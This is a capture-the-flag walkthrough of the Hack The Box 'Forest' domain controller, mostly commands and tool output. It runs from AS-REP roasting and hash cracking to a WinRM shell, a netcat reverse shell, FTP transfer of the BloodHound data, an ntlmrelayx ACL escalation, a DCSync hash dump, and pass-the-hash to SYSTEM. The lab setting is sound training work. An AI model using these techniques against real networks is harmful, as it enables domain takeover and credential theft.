As usual, first an nmap scan
root@kalivm:~/Forest# nmap -sTV -p 1-65535 -oN fullscan_tcp 10.10.10.161
Starting Nmap 7.80 (https://nmap.org ) at 2020-01-06 11:47 CET
Nmap scan report for 10.10.10.161
Host is up (0.016s latency).
Not shown: 65511 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain?
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2019-10-21 09:54:20Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49675/tcp open msrpc Microsoft Windows RPC
49682/tcp open msrpc Microsoft Windows RPC
49701/tcp open msrpc Microsoft Windows RPC
49913/tcp open msrpc Microsoft Windows RPC
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 159.67 seconds
There are already several interesting things in this result. First of all, this is a domain-connected system with the HTB.local domain. It has exposed kerberos, ldap and SMB services to the outside world and looks like it is a domain controller. And last but not least, a WinRM port is open. This could be an attack similar to the approach I took a long time ago for the ‘Active’ Machine on Hackthebox, combined with the winRM attack on Heist!
First let’s try enum4linux to see if I can list some more information.
root@kalivm:~/Forest# enum4linux -a 10.10.10.161
Starting enum4linux v0.8.9
==========================
| Target Information |
==========================
Target ........... 10.10.10.161
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
---snip---
===========================================
| Getting domain SID for 10.10.10.161 |
===========================================
Domain Name: HTB
Domain Sid: S-1-5-21-3072663084-364016917-1341370565
[+] Host is part of a domain (not a workgroup)
---snip---
=============================
| Users on 10.10.10.161 |
=============================
---snip---
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
---snip---
====================================================
| Password Policy Information for 10.10.10.161 |
====================================================
[+] Attaching to 10.10.10.161 using a NULL share
[+] Trying protocol 445/SMB...
[+] Found domain(s):
[+] HTB
[+] Builtin
[+] Password Info for Domain: HTB
[+] Minimum password length: 7
[+] Password history length: 24
[+] Maximum password age: 41 days 23 hours 53 minutes
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: 1 day 4 minutes
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 7
---snip---
==============================
| Groups on 10.10.10.161 |
==============================
---snip---
[+] Getting domain groups:
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Organization Management] rid:[0x450]
group:[Recipient Management] rid:[0x451]
group:[View-Only Organization Management] rid:[0x452]
group:[Public Folder Management] rid:[0x453]
group:[UM Management] rid:[0x454]
group:[Help Desk] rid:[0x455]
group:[Records Management] rid:[0x456]
group:[Discovery Management] rid:[0x457]
group:[Server Management] rid:[0x458]
group:[Delegated Setup] rid:[0x459]
group:[Hygiene Management] rid:[0x45a]
group:[Compliance Management] rid:[0x45b]
group:[Security Reader] rid:[0x45c]
group:[Security Administrator] rid:[0x45d]
group:[Exchange Servers] rid:[0x45e]
group:[Exchange Trusted Subsystem] rid:[0x45f]
group:[Managed Availability Servers] rid:[0x460]
group:[Exchange Windows Permissions] rid:[0x461]
group:[ExchangeLegacyInterop] rid:[0x462]
group:[$D31000-NSEL5BRJ63V7] rid:[0x46d]
group:[Service Accounts] rid:[0x47c]
group:[Privileged IT Accounts] rid:[0x47d]
group:[test] rid:[0x13ed]
[+] Getting domain group memberships:
Group 'Enterprise Admins' (RID: 519) has member: HTB\Administrator
Group 'Privileged IT Accounts' (RID: 1149) has member: HTB\Service Accounts
Group 'Service Accounts' (RID: 1148) has member: HTB\svc-alfresco
Group 'Domain Controllers' (RID: 516) has member: HTB\FOREST$
Group 'Exchange Trusted Subsystem' (RID: 1119) has member: HTB\EXCH01$
---snip---
enum4linux complete on Mon Oct 21 12:05:29 2019
Enum4linux offers many interesting things. First of all I see that there are some users (sebastien, lucinda, andy, mark, santi) present and a clear service account (svc-alfresco).
Furthermore, no password complexity seems to have been enforced, which can mean easy to guess / crack passwords. There seems to be a Microsoft Exchange installation present which is commonly known as a major security vulnerability if not properly configured! And a last line confirms the prompting, Forest is actually part of the group of domain controllers! So I started browsing the impacket tools and trying several until I got to the GetNPUsers.py tool.
root@kalivm:~/Forest# GetNPUsers.py -dc-ip 10.10.10.161 -no-pass HTB/sebastien
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[*] Getting TGT for sebastien
[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
root@kalivm:~/Forest# GetNPUsers.py -dc-ip 10.10.10.161 -no-pass HTB/lucinda
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[*] Getting TGT for lucinda
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
root@kalivm:~/Forest# GetNPUsers.py -dc-ip 10.10.10.161 -no-pass HTB/svc-alfresco
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[*] Getting TGT for svc-alfresco
$krb5asrep$23$svc-alfresco@HTB:38ca5d56d9fb6fd3c11015cecd122482$e6e0c606ccf778924c3e4dc02f63f3bfeae8c4b67ea08044268db8bde81aa007fb921555847d786b92084b72f6a2ac83d8843b33c5005e768208a7ede2e37663ce6891e080b45a11b361d0b5979e2eb9bf885f8e983ed21b4891559301dc693fc71d3eb2e7d8ec2b77b5668ec23ca4599bfddd3d9163325231d1933f50637cc8af4eba5f351dd703c91c2ded255ebec3d3629bbd0949ae1d5df267010acd0289440e255abe7955ce2c5658dd8ef83cc0eaccd84a1b293334edad0398cf78247cc275aaae85bba3f42f3de757ab726547d401f06cda2b8af5f9200d8f95f7001e
After trying it for some users, I finally got a TGT for the user svc-alfresco that I could try cracking with hashcat.
[hashcat] $ hashcat -m 18200 -a 0 -w 3 forest.hash rockyou.txt
---snip---
Dictionary cache hit:
* Filename..: rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
$krb5asrep$23$svc-alfresco@HTB:38ca5d56d9fb6fd3c11015cecd122482$e6e0c606ccf778924c3e4dc02f63f3bfeae8c4b67ea08044268db8bde81aa007fb921555847d786b92084b72f6a2ac83d8843b33c5005e768208a7ede2e37663ce6891e080b45a11b361d0b5979e2eb9bf885f8e983ed21b4891559301dc693fc71d3eb2e7d8ec2b77b5668ec23ca4599bfddd3d9163325231d1933f50637cc8af4eba5f351dd703c91c2ded255ebec3d3629bbd0949ae1d5df267010acd0289440e255abe7955ce2c5658dd8ef83cc0eaccd84a1b293334edad0398cf78247cc275aaae85bba3f42f3de757ab726547d401f06cda2b8af5f9200d8f95f7001e:s3rvice
Session..........: hashcat
Status...........: Cracked
Hash.Type........: Kerberos 5 AS-REP etype 23
Hash.Target......: $krb5asrep$23$svc-alfresco@HTB:a886b951410cd0d9b804...a751ba
Time.Started.....: Fri Oct 25 12:37:07 2019 (1 sec)
Time.Estimated...: Fri Oct 25 12:37:08 2019 (0 secs)
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 13838.5 kH/s (13.64ms) @ Accel:1024 Loops:1 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 4587520/14344385 (31.98%)
Rejected.........: 0/4587520 (0.00%)
Restore.Point....: 3932160/14344385 (27.41%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: seaford123 -> pommiey4632@hotmail.com
Hardware.Mon.#1..: Temp: 41c Fan: 24% Util: 46% Core:1898MHz Mem:3802MHz Bus:16
So apparently Alfresco’s password is s3rvice. The next thing I did was tweak the WinRM shell I made earlier for Hackthebox – Heist to include correct username, password and IP address
require 'winrm'
conn = WinRM::Connection.new(
endpoint: 'http://10.10.10.161:5985/wsman',
user: 'svc-alfresco',
password: 's3rvice',
)
command=""
conn.shell(:powershell) do |shell|
until command == "exit\n" do
print "PS > "
command = gets
output = shell.run(command) do |stdout, stderr|
STDOUT.print stdout
STDERR.print stderr
end
end
puts "Exiting with code #{output.exitcode}"
end
and run it to get shell access.
root@kalivm:~/Forest# ruby shell.rb
PS > whoami
htb\svc-alfresco
All you have to do is get the user hash and start escalating privileges
PS > type ..\Desktop\user.txt
e5e4*****d9ed
Privilege Escalation
The next step is escalating privileges, after pressing CTRL-C too many times I decided it was time to install a simple fallback.
root@kalivm:~/Forest# ruby shell.rb
PS > mkdir sedje
PS > cd sedje
PS > IWR -uri http://10.10.15.64:8000/nc.exe -outfile nc.exe
PS > ./nc 10.10.15.64 9002 -e powershell.exe
root@kalivm:~/Forest# nc -nvlp 9002
Listening on 0.0.0.0 9002
Connection received on 10.10.10.161 50030
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.
PS C:\Users\svc-alfresco\Documents\sedje>
PS C:\Users\svc-alfresco\Documents\sedje> IWR -uri http://10.10.15.64:8000/SharpHound.ps1 -outfile SharpHound.ps1
PS C:\Users\svc-alfresco\Documents\sedje> IWR -uri http://10.10.15.64:8000/SharpHound.exe -outfile SharpHound.exe
PS C:\Users\svc-alfresco\Documents\sedje> Import-Module .\SharpHound.ps1
PS C:\Users\svc-alfresco\Documents\sedje> Invoke-BloodHound -CollectionMethod All -LDAPUser svc-alfresco -LDAPPass s3rvice
PS C:\Users\svc-alfresco\Documents\sedje> dir
Directory: C:\Users\svc-alfresco\Documents\sedje
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/25/2019 5:20 AM 12950 20191025120253_BloodHound.zip
-a---- 10/25/2019 5:20 AM 9151 Rk9SRVNU.bin
-a---- 10/25/2019 5:18 AM 751616 SharpHound.exe
-a---- 10/25/2019 5:17 AM 886595 SharpHound.ps1
After the SharpHound script and binary file are transferred, I run them with the user svc-alfresco and the script provides a zip file with all relevant domain data. All that remains is to transfer the file to my local machine and analyze it with BloodHound. The easiest and most used way I learned during my OSCP journey was to easily create and run an FTP script.
PS C:\Users\svc-alfresco\Documents\sedje> echo "open 10.10.15.64" > ftp
PS C:\Users\svc-alfresco\Documents\sedje> echo "anonymous" >> ftp
PS C:\Users\svc-alfresco\Documents\sedje> echo "" >> ftp
PS C:\Users\svc-alfresco\Documents\sedje> echo "put 20191101052032_BloodHound.zip" >> ftp
PS C:\Users\svc-alfresco\Documents\sedje> echo "quit" >> ftp
PS C:\Users\svc-alfresco\Documents\sedje> ftp -s:ftp
open 10.10.15.64
Log in with USER and PASS first.
User (10.10.15.64:(none)):
put 20191025120253_BloodHound.zip
quit
Of course, this approach requires an active FTP server on my attacker, which can be easily done with Python
root@kalivm:~/Forest# python -m pyftpdlib -p 21 -w
/usr/lib/python2.7/dist-packages/pyftpdlib/authorizers.py:244: RuntimeWarning: write permissions assigned to anonymous user.
RuntimeWarning)
[I 2019-10-25 13:15:13] >>> starting FTP server on 0.0.0.0:21, pid=5057 < <<
[I 2019-10-25 13:15:13] concurrency model: async
[I 2019-10-25 13:15:13] masquerade (NAT) address: None
[I 2019-10-25 13:15:13] passive ports: None
[I 2019-10-25 13:15:27] 10.10.10.161:56840-[] FTP session opened (connect)
[I 2019-10-25 13:15:27] 10.10.10.161:56840-[anonymous] USER 'anonymous' logged in.
[I 2019-10-25 13:15:27] 10.10.10.161:56840-[anonymous] STOR /root/Documents/htb/Machines/Forest/20191025120253_BloodHound.zip completed=1 bytes=12950 seconds=0.07
[I 2019-10-25 13:15:27] 10.10.10.161:56840-[anonymous] FTP session closed (disconnect).
Thus, the file has been successfully transferred and can be loaded directly into BloodHound by simply dragging and dropping.
PS C:\Users\svc-alfresco\Documents\sedje> IWR -uri http://10.10.15.64:8000/PowerView.ps1 -outfile Powerview.ps1
PS C:\Users\svc-alfresco\Documents\sedje> Import-Module .\PowerView.ps1
PS C:\Users\svc-alfresco\Documents\sedje> $SecPassword = ConvertTo-SecureString 's3rvice' -AsPlainText -Force
PS C:\Users\svc-alfresco\Documents\sedje> $Cred = New-Object System.Management.Automation.PSCredential('HTB\svc-alfresco', $SecPassword)
PS C:\Users\svc-alfresco\Documents\sedje> New-DomainUser -SamAccountName sedje -AccountPassword $SecPassword -Credential $Cred | Add-DomainGroupMember 'Exchange Windows Permissions' -Credential $Cred
When you add the svc alfresco account to the ‘Exchange Windows Permissions’ group, it will be deleted again after a few minutes, which is quite a pain. So I decide to add my own user to the domain with the same password as user svc-alfresco and add to the group `Exchange Windows permissions`. However, after that, I lingered for a long time due to the very specific syntax and switches required (and available) with the impacket tools. If some Discord users had not helped me, I would probably have given up in the end, so I have to thank them for pushing them in the next step!
root@kalivm:~/Forest# ntlmrelayx.py --escalate-user sedje -t ldap://10.10.10.161
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server
[*] Servers started, waiting for connections
Now all I have to do is browse to the localhost connection and provide valid credentials, NTLMRelay will do all the hard work and change the permissions for me.I open a browser for localhost and provide the sedje credentials.
[*] HTTPD: Received connection from 127.0.0.1, attacking target ldap://10.10.10.161
[*] HTTPD: Client requested path: /
[*] HTTPD: Client requested path: /
[*] HTTPD: Client requested path: /
[*] Authenticating against ldap://10.10.10.161 as \sedje SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] User privileges found: Create user
[*] User privileges found: Modifying domain ACL
[*] Querying domain security descriptor
[*] Success! User sedje now has Replication-Get-Changes-All privileges on the domain
[*] Try using DCSync with secretsdump.py and this user :)
[*] Saved restore state to aclpwn-20191025-135738.restoresedsedss
And ntlmrelayx.py already tells me what to do, sedje now has proper permissions to continue secretsdump.py.
root@kalivm:~/Forest# secretsdump.py htb/sedje:s3rvice@10.10.10.161
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
---snip---
Use secretsdump.py to get all the hashes in the domain
root@kalivm:~/Forest# psexec.py -hashes :32693b11e6aa90eb43d32c72a07ceea6 htb/administrator@10.10.10.161 powershell.exe
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[*] Requesting shares on 10.10.10.161.....
[*] Found writable share ADMIN$
[*] Uploading file ezaVoayr.exe
[*] Opening SVCManager on 10.10.10.161.....
[*] Creating service CAke on 10.10.10.161.....
[*] Starting service CAke.....
[!] Press help for extra shell commands
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.
PS C:\Windows\system32> whoami
whoami
nt authority\system
PS C:\Windows\system32> type c:\Users\Administrator\Desktop\root.txt
type c:\Users\Administrator\Desktop\root.txt
f048153f202bbb2f82622b04d79129cc
Author: Puckiestyle